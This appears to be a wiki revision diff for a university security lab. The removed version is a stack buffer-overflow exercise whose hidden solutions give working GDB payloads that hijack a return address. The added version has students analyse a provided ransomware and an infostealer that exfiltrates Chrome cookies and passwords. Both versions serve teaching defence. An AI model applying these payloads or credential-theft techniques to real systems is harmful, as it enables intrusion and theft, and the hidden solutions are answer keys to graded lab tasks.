-pwndbg> show disable-randomization
-Disabling randomization of debuggee's virtual address space is on.
-pwndbg> set disable-randomization off
-pwndbg> start
-              if (argc == 1) {
-...
-pwndbg> p &buf
-$6 = (char (*)[4]) 0xffdfba0c
-pwndbg> start
-              if (argc == 1) {
-...
-pwndbg> p &buf
-$7 = (char (*)[4]) 0xffe73a5c
-</code>
-</solution>
-=== 05. [15p] Address investigation ===
-Restart gdb and run until the beginning of the ''copy'' function.
-  * At what address is ''name'' located?
-  * At what address is the saved return address located?
-  * How many bytes of input do you need in order to overwrite the return address?
-**Hint:** Display stack info using ''info frame''.
-<solution -hidden>
-<code>
-➜ gdb buggy
-...
-pwndbg> b copy
-Breakpoint 1 at 0x1229: file buggy.c, line 16.
-pwndbg> r "Florin"
-Starting program: /home/student/appsec/buggy "Florin"
-...
-hey, Florin
-Breakpoint 1, copy () at buggy.c:16
-              printf("what's ur last name?\n");
-...
-pwndbg> p &name
-$1 = (char (*)[12]) 0xffffd834
-pwndbg> info frame
-Stack level 0, frame at 0xffffd850:
- eip = 0x80491e0 in copy (buggy.c:16); saved eip = 0x804926a
- called by frame at 0xffffd880
- source language c.
- Arglist at 0xffffd848, args:
- Locals at 0xffffd848, Previous frame's sp is 0xffffd850
- Saved registers:
-  ebp at 0xffffd848, eip at 0xffffd84c
-pwndbg> p 0xffffd84c - 0xffffd834
-$2 = 24
-</code>
-</solution>
-=== 06. [5p] Buffer overflow ===
-We want to overflow the buffer ''name'' from the ''copy()'' function. Run the program and provide an input so that the program crashes.
-<note tip>
-You can use ''%%run args <<< (python3 -c 'import sys; sys.stdout.buffer.write(b"A" * N)')%%'' for stdin redirection directly within GDB! ;)
 </note>
-<note warning>
+<note>
+**FLAG 4 [10p]**
-Do not use ''print'' in Python for this purpose as some installations (especially on Ubuntu) use a default UTF-8 encoding and auto-correct any unknown binary string to a valid sequence.
-You can test the binary output using **xxd**: ''python3 -c '... write here ...' | xxd -g 1''
+Decrypt the files, maybe they contained a flag. You can use the provided ''%%decryptor.exe%%'' (on your Desktop), or you can challenge yourself and try to decrypt them manually (CyberChef can be of great help here; assume the encryption is a well-known one).
 </note>
-=== 07. [20p] Call the ''wanted'' function ===
-We want to create an attack which invokes the ''wanted'' function. What is the address of this function?
-Adjust the input so that the return address is overwritten with the address of the ''wanted'' function.
 <note tip>
+You can also use any of the sandboxes you used at the first exercise and see what useful information they can provide.
-Use ''objdump -d -M intel buggy'' to list all the addresses from the binary. Look for the address of the ''wanted'' function.
 </note>
-You can see that when using ''objdump'' the addresses look weird (short):
+<ifauth @isc>
+<hidden>
+Cheia e trimisa ca DNS request (hex-encoded).
 <code>
+.\decryptor.exe $hex_key .\very_important_documents
-cd <wanted>:
-cd:       55                      push   ebp
-ce:       89 e5                   mov    ebp,esp
-d0:       53                      push   ebx
-d1:       83 ec 04                sub    esp,0x4
 </code>
-They aren't actually real addresses, they are offsets counting the number of bytes from the beginning of the file.
+Flag-ul din documente e sub trollface-ul din documentul ''%%subiecte examen ISC.docx%%''
+</hidden>
+</ifauth>
-This happens because the program was compiled as PIC (position independent code).
+===== 04. Infostealers =====
-More details can be found [[https://codywu2010.wordpress.com/2014/11/29/about-elf-pie-pic-and-else/|here]].
-Recompile the program without PIC and PIE using ''-fno-pic -no-pie'' options for GCC.
+As the name suggests, this type of malware steals information from your system. Usually, they steal browser data, since it can contain:
-<code>
+  * stored passwords
+  * saved credit cards
+  * valid cookies (they can be used for [[https://owasp.org/www-community/attacks/Session_hijacking_attack|session hijacking]])
-a6 <wanted>:
+**As before, run the provided ''%%infostealer.exe%%'' from your lab assistant (or the backup one)**
-a6:       55                      push   ebp
-a7:       89 e5                   mov    ebp,esp
-a9:       83 ec 08                sub    esp,0x8
-</code>
-<solution -hidden>
+Seemingly nothing happens (except that your browser might close on you), but let us take a look at what files are accessed by ''%%infostealer.exe%%''. We can use the tool ''%%procmon64%%'' from the [[https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite|Sysinternals Suite]] to analyze some of the runtime behavior of a program, including accessed files and network activity.
-<code>
-pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08")')
+<note>
-...
+**FLAG 5 [30p]**
-hey, args
-what's ur last name?
-bye
-at least you tried
-Program received signal SIGSEGV, Segmentation fault.
+Find what information has been stolen from you. There’s a flag in there.
+</note>
-</code>
-</solution>
-=== 08. [20p] Calling the ''wanted'' function with the correct arguments ===
+Use ''%%procmon64%%'' to look for accessed files and network activity. By default ''%%procmon64%%'' shows what all current processes are doing. Try and filter for our process (look at what options ''%%procmon64%%'' offers you at the top of the window).
-The ''wanted'' function takes an argument.
+<note tip>
+**You need to run the binary again after setting up your filters!**
+</note>
-Adjust the previous payload so that when calling ''wanted'', the message ''well done, you're cool!'' is displayed.
+Also try to have a look at the files that are managed by Chrome and check out the links at the end of the lab if you want to better understand how he passwords are stored. You also have a tool to explore SQLite databases installed already.
-<solution -hidden>
+<spoiler Hint>
-<code>
+If there is some network activity that interests you, you can use Wireshark. It has some awesome features, like extracting objects from network requests (//wink wink//).
+</spoiler>
-pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08" + b"B" * 4 + b"\xbe\xba\xfe\xca")')
-...
-hey, Florin
-what's ur last name?
-bye
-well done, you're cool!
-Program received signal SIGSEGV, Segmentation fault.
-</code>
-</solution>
-=== 09. [20p] Graceful exit ===
-We can see that even if we call ''wanted'' with the correct arguments, the program still crashes.
-Let's remove any trace that we've been there. Adjust the previous payload so that the program exits without a segmentation fault.
 <note tip>
+Make use of the sandboxes, maybe they also provide some useful information. See how it compares to what you find by manually analyzing the binary.
-Can you call another function after ''wanted''?
-What would be a great function to call?
-Where can you get its address from?
-After finding out the function, look for its address using ''objdump'', you might find something there.
 </note>
-<solution -hidden>
+<ifauth @isc>
-<code>
-➜ objdump -d -M intel buffovf | grep exit
-08049080 <exit@plt>:
-...
-➜ gdb buggy
-...
-pwndbg> run "Florin" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 24 + b"\xa6\x91\x04\x08" + b"\x80\x90\x04\x08" + b"\xbe\xba\xfe\xca")')
-...
-hey, Florin
-what's ur last name?
-bye
-well done, you're cool!
-[Inferior 1 (process 39220) exited normally]
-</code>
-</solution>
 <hidden>
+Arhiva cu cookie-urile si parolele de la Chrome e trimisa ca POST request. (Wireshark > File > Export objects > HTTP)
+</hidden>
+</ifauth>
-=== 10. Writing memory ===
+===== 05. [Bonus] Anti-reversing techniques =====
-We want to use our new GDB skills to make the application print two times ''Hello!'', even if we run it having ''AAA'' as argument.
+If you were brave enough to try and decompile the executables, you might have noticed they look like gibberish. If not, use Ghidra to have a look at one of the executables.
-  - Find out the address of the buffer containing the ''Hello!'' string.
-  - Continue the execution until the beginning of the ''copy'' function, disassemble the code and go step by step through the assembly instructions until the ''call'' instruction (do not execute the call).
-  - Print the value of the stack pointer. Dump 2 values on the stack. What are the two values representing?
-  - Overwrite the second value on the stack with the address of the buffer containing the ''Hello!'' string and then continue the execution. What happened?
-<solution -hidden>
+The executables are missing any symbols and the code seems very hard to understand. That is because they are packed using [[https://upx.github.io/|UPX]]. While UPX is an executable packer, meant to be used for executable compression, it is also commonly used to make reverse engineering harder.
-<code>
-(gdb) b main
+The good news is that you can also unpack it using UPX. It is already installed in your VM, so give it a try.
-Breakpoint 2 at 0x8048483: file buffovf.c, line 16.
-(gdb) r
-The program being debugged has been started already.
-Start it from the beginning? (y or n) y
-Starting program: /home/veronica/work/isc/lab6/buffovf AAA
-Breakpoint 2, main (argc=2, argv=0xffffcff4) at buffovf.c:16
+After unpacking it, try to decompile it again using Ghidra. Does it look a little bit more readable?
-		char buf[] = "Hello!";
-(gdb) p &buf
-$10 = (char (*)[7]) 0xffffcf39
-(gdb) c
-Continuing.
-Hello!
-Breakpoint 1, copy (arg=0xffffd20b "AAA") at buffovf.c:12
-	  	strcpy(buf, arg);
-(gdb) disass
-Dump of assembler code for function copy:
-x08048454 <+0>:	push   %ebp
-x08048455 <+1>:	mov    %esp,%ebp
-x08048457 <+3>:	sub    $0x18,%esp
-=> 0x0804845a <+6>:	sub    $0x8,%esp
-x0804845d <+9>:	pushl  0x8(%ebp)
-x08048460 <+12>:	lea    -0xd(%ebp),%eax
-x08048463 <+15>:	push   %eax
-x08048464 <+16>:	call   0x8048300 <strcpy@plt>
-x08048469 <+21>:	add    $0x10,%esp
-x0804846c <+24>:	nop
-x0804846d <+25>:	leave
-x0804846e <+26>:	ret
-End of assembler dump.
-(gdb) si
-x0804845d	12	  	strcpy(buf, arg);
-(gdb) si
-x08048460	12	  	strcpy(buf, arg);
-(gdb) si
-x08048463	12	  	strcpy(buf, arg);
-(gdb) si
-x08048464	12	  	strcpy(buf, arg);
-(gdb) disass
-Dump of assembler code for function copy:
-x08048454 <+0>:	push   %ebp
-x08048455 <+1>:	mov    %esp,%ebp
-x08048457 <+3>:	sub    $0x18,%esp
-x0804845a <+6>:	sub    $0x8,%esp
-x0804845d <+9>:	pushl  0x8(%ebp)
-x08048460 <+12>:	lea    -0xd(%ebp),%eax
-x08048463 <+15>:	push   %eax
-=> 0x08048464 <+16>:	call   0x8048300 <strcpy@plt>
-x08048469 <+21>:	add    $0x10,%esp
-x0804846c <+24>:	nop
-x0804846d <+25>:	leave
-x0804846e <+26>:	ret
-End of assembler dump.
-(gdb) p $esp
-$8 = (void *) 0xffffcef0
-(gdb) x/2xw 0xffffcef0
-xffffcef0:	0xffffcf0b	0xffffd20b
-(gdb) x/s 0xffffd20b
-xffffd20b:	"AAA"
-(gdb) set {int}0xffffcef4=0xffffcf39
-(gdb) x/2xw 0xffffcef0
-xffffcef0:	0xffffcf0b	0xffffcf39
-(gdb) c
-Continuing.
-Hello!
-[Inferior 1 (process 2906) exited normally]
-</code>
-</solution>
-</hidden>
-=== Feedback ===
+It is still not as readable as if you were expecting if you ever looked at a C binary decompiled, and that is because our executables were written in Go. Another technique that makes reverse engineering harder is the use of modern languages (Go, Rust, Zig, Nim), as they each come with their own (complex) runtime.
-Please take a minute to fill in the [[https://forms.gle/5Lu1mFa63zptk2ox9|feedback form]] for this lab.
+===== Further reading =====
+  * https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
+  * https://superuser.com/questions/718383/where-are-google-chrome-passwords-stored-in-windows
+  * https://superuser.com/questions/146742/how-does-google-chrome-store-passwords
+  * https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/

isc/labs/06.1699988945.txt.gz · Last modified: 2023/11/14 21:09 by alexandru.ghita2611

Show page Old revisions

Media Manager Back to top

Differences

Lectures

Labs

Support